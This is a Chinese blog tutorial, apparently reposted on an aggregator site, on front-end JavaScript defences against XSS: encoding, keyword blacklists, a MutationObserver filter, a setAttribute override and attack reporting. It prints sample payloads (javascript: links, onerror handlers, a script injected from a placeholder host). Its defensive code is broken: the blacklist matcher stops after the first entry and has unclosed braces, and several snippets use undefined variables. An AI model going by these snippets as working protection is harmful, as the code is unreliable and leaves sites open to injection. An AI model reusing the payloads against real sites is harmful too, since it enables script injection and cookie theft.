前端安全 — 浅谈JavaScript拦截XSS攻击
XSS/跨站脚本攻击,是一种代码注入网页攻击,攻击者可以将代码植入到其他用户都能访问到的页面(如论坛、留言板、贴吧等)中。
如今,XSS 攻击所涉及的场景愈发广泛。越来越多的客户端软件支持 html 解析和 JavaScript 解析,比如:HTML 文档、XML 文档、Flash、PDF、QQ、一些音乐播放器以及浏览器的功能界面等。这些用户经常使用的场景往往都是 XSS 攻击的高发地带。
一、XSS攻击类型
1. 存储型XSS(持久型)
攻击者在表单内提交恶意 js 代码 ( 如 <script>alert('hello')</script>
),网站后端对提交数据不做任何安全处理,直接存储在数据库中。当其他用户访问这个已被攻击的网站,js 代码攻击就会被触发。这个类型的 XSS 攻击会存储在数据库中,持续时间长,影响范围大。
2. 反射型XSS(非持久型)
反射型 XSS 攻击,是正常用户请求一个非法资源时触发的攻击。此类型攻击通常需要用户主动去访问带攻击的链接,一旦点开了链接,大概率被成功攻击(比如:我有一部电影资源,请点击 http://xxxxx 下载)。
3. DOM XSS
基于 DOM 的 XSS 攻击是反射型攻击的变种。服务器正常返回数据,其攻击在于正常用户进行某种操作 ( js 操作) 时,触发攻击者的 URL 攻击代码,服务器难以检测出这是否为非法请求。
二、XSS攻击的危害
- 挂马;
- 盗取用户cookie;
- DoS(拒绝服务)客户端浏览器;
- 钓鱼攻击,高级钓鱼技巧;
- 编写针对性的 XSS 病毒,删除目标文章、恶意篡改数据、嫁祸;
- 劫持用户 Web 行为, 进一步渗透内网;
- 爆发 Web2.0 蠕虫;
- 蠕虫式的 DDoS 攻击;
- 蠕虫式挂马攻击、刷广告、刷流量、破坏网上数据
- ……
三、JavaScript拦截
随着互联网发展,XSS 攻击涉及场景越大,其造成的危害随之扩大。拦截与防护的关键,重中之重当然是从后端入手。然而,这并不意味着网页前端无需进行相应的拦截。前后端共同拦截,网站应对 XSS 攻击的防护才会更加周全。接下来,本文将浅析前端的 XSS 攻击拦截。
XSS 攻击简单来说就是代码的注入,特指恶意用户输入恶意程序代码。为了防范这类代码的注入,网站需要确保其用户输入的安全性。对于攻击验证,可以采用以下措施:
> 1. 编码,即转义用户的输入,把用户的输入解读为数据而不是代码; > 2. 校验,对用户的输入及请求一律进行黑名单过滤检查,如对特殊字符进行过滤,设置输入域的匹配规则等,主要针对三类注入:内联事件及内联脚本、静态脚本、动态脚本; > 3. 建立上报攻击信息,对攻击者攻击信息进行分析,增强黑名单。
1. 编码
在客户端使用 JavaScript 对用户输入进行编码时,有一些内置的方法和属性可以在自动感知上下文的情况下,对所有的输入数据进行编码。
一些自动编码的方法可参考下表:
上下文 | 方法 |
---|---|
html元素 | 例:<div>userinput</div> <br> → node.textContent = userInput |
html属性 | 例:<input value="userInput"> <br> → node.setAttribute(attr,userInput) |
URL查询值 | 例:http://example.com/?parameter=userInput <br> → encodeURIComponent(userInput) |
CSS值 | 例:color: userInput <br> → Node.style.property=userInput |
2. 内联事件及内联脚本
一些比较常见的注入方式,大部分都是 javascript:...
及内联事件 on*
。如:
<a href="javascript:alert('hello')"></a> <iframe src="javascript:alert('hello')"></iframe> <img src="x" onerror="alert('hello')"> <video src="x" onerror="alert('hello')"></video> <div onclick="alert('hello')" onmouseover="alert('hello2')"><div>
类似这种注入,我们需要在浏览器触发点击事件前,对 javascript:...
内容进行黑名单判断,以实现防护效果。对于 on*
也是一样,可以使用 addEventListener
防护内联事件注入:
// 定义 黑名单 策略 var blackList = [ 'xss', 'flow..' ]; // 黑名单匹配 function blackMatch(blackList, value) { if (!blackList) return false; for (var i=0; i < blackList.length; i++) { var reg = new RegExp(blackList[i], 'i'); if (reg.test(value)) { return true; } else { return false; } } document.addEventListener('click', function(e) { var el = e.target; //查找 a标签 <a href="javascript:"> if (el.tagName === 'A' && el.protocol === 'javascript:') { var code = el.href.substr(11); if (blackMatch(blackList, code)) { //非法输入 elem.href = 'javascript:void(0)'; } } }, true)
3. 静态脚本
通常,攻击者会向页面中注入一个静态脚本链接,比如,注入 <scriptsrc="http: xxx xss.js">
。对于这类注入,我们需要在脚本执行前找出可疑脚本,并销毁掉。此处可使用 MutationObserver
高级 api,在页面加载变化时,对静态脚本文件进行监控:
// Mutation 监听DOM树变化 var observer = new MutationObserver(function(mutations) { mutations.forEach(function(mutation) { // 添加节点数 var nodes = mutation.addedNodes; for (var i = 0; i <= nodes.length - 1; i++) { var node = nodes[i]; //blacklist 黑名单策略列表 if (blackMatch(blackList, code)) { node.parentNode.removeChild(node); console.log('发现可疑模块:', node); } } }); }); // 当页面元素节点添加和删除操作会被观察到 observer.observe(document, { subtree: true, childList: true });
4. 动态脚本
除上述静态脚本外,攻击者还经常使用动态脚本注入,而且 MutationObserver
api 无法监听 DOM 的变化,攻击脚本依旧会执行。比如:
var script = document.createElement('script'); script.setAttribute('type', 'text/javascript'); script.setAttribute('src', 'http://xxxxx/xss.js'); document.getElementsByTagName('body')[0].appendChild(script)
这种注入方式,可能需要使用原生的 setAttribute
方法,来监听 src
属性的值,再通过黑名单判断它是否具有合法性,重写 setAttribute
接口来实现防护:
var old_setAttribute = Element.prototype.setAttribute; // 重写 setAttribute 接口 Element.prototype.setAttribute = function(name, value) { if (this.tagName == 'SCRIPT' && /^src$/i.test(name)) { // 黑名单判断 if (blackMatch(blackList, value)) { console.log('发现可疑模块:', value); return; } } old_setAttribute.apply(this, arguments); };
5. 上报攻击信息
上述几种前端防护均需要黑名单库进行判断,然而如何才能增强黑名单呢?
我们需要将攻击者每次的攻击信息收集起来,并发送到服务器进行分析、处理。这样一来,不仅可以增强黑名单,还能根据收集到的信息设计针对性措施。
可定义一个上报函数,使用 node 接收攻击信息。其结果如下:
function hijackReport(name, value) { var img = document.createElement('img'), hijackName = name, hijackValue = value.toString(), curDate = new Date().getTime(); // 上报 img.src = 'http://192.168.1.3:3002/report/?msg=' + hijackName + '&value=' + hijackValue + '&time=' + curDate; }
在此,有一个防 XSS 攻击的库可供学习了解。
Tips - Content Security Policy (CSP)
使用验证来防止 XSS 攻击的缺陷在于,只要存在一丝漏洞,就会使网站遭到攻击,而 Content Security Policy (CSP) 的标准则能够降低这一风险。
(张杰 | 天存信息)
Ref
- 《Web前端黑客技术揭秘》 - 钟晨鸣
- ‘JavaScript防http劫持与XSS’ - shanyezi
- https://github.com/leizongmin/js-xss
</scriptsrc="http:></a></div></div>

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
一键导出全部邮件到本地,彻底解放双手
大家好,我是辰哥 大家可能会遇到这样一种情况:有没有什么办法可以将邮箱里面的邮件全部下载到本地(包括图文、压缩附件、文档附件等)。比如HR、收集意见的工作人员甚至是一些负责收邮件的老师等人都会遇到这种情况。 今天辰哥就教大家如何利用Python去下载邮箱中的全部邮件,本文核心库主要是zmail。 01、准备工作 **1.安装库 ** pipinstall zmail 通过上面的命令即可安装zmail 导入库 import zmail 2.开启****POP3/SMTP服务 在程序中登录QQ邮箱不是使用qq邮箱密码,是使用POP3/SMTP服务口令,所以我们这里先获取口令 第一步:登录qq邮箱点击设置,再点账户 第二步:开启POP3/SMTP,点击开启后会生成一段字符串(token),这里辰哥已经开启了 02、下载全部邮件 1.登录账户 下载的全部邮件都会保存在文件夹chenge中 2.读取全部邮件 目标:下载全部的邮件。所以这里获取到邮件数,并通过循环去遍历 3.创建保存文件夹 这里提取邮件日期和主题,在chenge文件夹下为该邮件创建文件夹(到时候保存正文内容和附件) 4.保存邮件正...
- 下一篇
数栈技术分享:用短平快的方式告诉你Flink-SQL的扩展实现
数栈是云原生—站式数据中台PaaS,我们在github和gitee上有一个有趣的开源项目:FlinkX,FlinkX是一个基于Flink的批流统一的数据同步工具,既可以采集静态的数据,也可以采集实时变化的数据,是全域、异构、批流一体的数据同步引擎。大家喜欢的话请给我们点个star!star!star! github开源项目:https://github.com/DTStack/flinkx gitee开源项目:https://gitee.com/dtstack_dev_0/flinkx 首先,本文所述均基于flink 1.5.4。 一、我们为什么扩展Flink-SQL? 由于Flink 本身SQL语法并不提供在对接输入源和输出目的的SQL语法。数据开发在使用的过程中需要根据其提供的Api接口编写Source和 Sink, 异常繁琐,不仅需要了解FLink 各类Operator的API,还需要对各个组件的相关调用方式有了解(比如kafka,redis,mongo,hbase等),并且在需要关联到外部数据源的时候没有提供SQL相关的实现方式,因此数据开发直接使用Flink编写SQL作为实...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- 2048小游戏-低调大师作品
- Docker使用Oracle官方镜像安装(12C,18C,19C)
- Docker安装Oracle12C,快速搭建Oracle学习环境
- Linux系统CentOS6、CentOS7手动修改IP地址
- CentOS7安装Docker,走上虚拟化容器引擎之路
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- CentOS7设置SWAP分区,小内存服务器的救世主
- CentOS6,7,8上安装Nginx,支持https2.0的开启
- Eclipse初始化配置,告别卡顿、闪退、编译时间过长